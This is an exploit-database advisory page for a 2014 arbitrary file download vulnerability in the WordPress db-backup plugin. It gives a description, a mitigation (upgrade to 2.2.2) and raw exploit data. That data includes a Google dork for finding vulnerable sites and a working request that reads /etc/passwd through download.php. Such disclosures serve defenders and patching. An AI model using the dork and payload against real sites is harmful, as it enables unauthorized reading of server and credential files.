header-logo
Suggest Exploit
vendor:
WP Database Backup
by:
Ashiyane Digital Security Team
7,5
CVSS
HIGH
File Download Vulnerability
22
CWE
Product Name: WP Database Backup
Affected Version From: All versions prior to 2.2.2
Affected Version To: 2.2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wp-database-backup
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2014

WordPress db-backup plugin File Download Vulnerability

A vulnerability in the Wordpress db-backup plugin allows an attacker to download any file from the server by accessing the download.php file with the file path as a parameter. This vulnerability affects all versions of the plugin prior to version 2.2.2.

Mitigation:

Upgrade to the latest version of the plugin (2.2.2) to fix this vulnerability.
Source

Exploit-DB raw data:

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress db-backup plugin File Download Vulnerability
|
|[*] Google Dork: inurl:wp-content/plugins/db-backup/
|
|[*] Date : Date: 2014-11-26
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*] Vendor Homepage : https://wordpress.org/plugins/wp-database-backup/
|
|[*] Plugin Link : https://downloads.wordpress.org/plugin/wp-database-backup.zip
|
|[*] Tested on: Windows 7
|
|[*] Discovered By : ACC3SS
|
|-------------------------------------------------------------------------|
|
|[*] Location :[localhost]/wp-content/plugins/db-backup/download.php?file=/etc/passwd
|
|-------------------------------------------------------------------------|
|
|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|